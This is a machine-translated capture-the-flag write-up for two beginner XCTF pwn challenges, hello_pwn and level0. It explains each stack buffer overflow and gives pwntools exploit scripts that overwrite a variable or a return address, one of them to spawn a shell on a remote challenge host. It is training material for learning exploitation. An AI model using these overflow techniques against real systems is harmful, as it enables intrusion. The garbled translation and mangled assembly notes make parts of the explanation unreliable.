xctf-hello_pwn
Topic Portal: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5052
It is an overflow, and yesterday are the same purpose at:
Difference 4 bytes, an overflow value change dword_60106C NUAA (note: this is a small terminal memory, write to 'aaun')
exp:
from pwn import * #cnn = process('./hello_pwn') cnn = remote('111.198.29.45',32280) payload = 'a'*4+'aaun' cnn.recvuntil('bof') cnn.send(payload) print(cnn.recv()) cnn.interactive()
Summary: Note Note the small end of the small end ~~~~~~ ~~~~~ ~~~~~ attention to the small end
xctf-level0
Topic Portal: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053
After dragged ida, F5 look and found that the output Hello world, and then perform the function vulnerable_function (), follow:
Find a read, buf length is 80. After the length exceeds 80, the address will realize just jump.
Compilation look. Can be found at the time of read, covering the return address for the address callsystem, you can achieve exploits functions.
For leave instructions can know: the role Leave a considerable == mov esp, ebp and pop ebp
retn == pop eip, so the back to give the leave instruction plus 4 * 2 = 8 characters, and then the cover retn pop eip
So configured: payload = 'a' * 80 + 'a' * 8 + (callsystem address), which is callsystem address 0x400596:
So you can get exp:
from pwn import * #cnn = process('./level0') cnn = remote('111.198.29.45',35563) payload = 'a'*0x88+p64(0x400596) cnn.sendline(payload) cnn.interactive()
Get shell, then ls view, cat flag command to get flag:
to sum up:
enter instruction: Push ebp # The push ebp MOV ebp% esp ESP to save #% ebp, which is the standard two-step function at the beginning of the leave instruction leave is equivalent to the following assembler instruction: MOV ESP, ebp POP ebp Call instruction Call foo (foo is a numeral) is equivalent to the assembly instructions: Push EIP MOV EIP, foo ret instruction ret assembly instructions equivalent to the following: POP EIP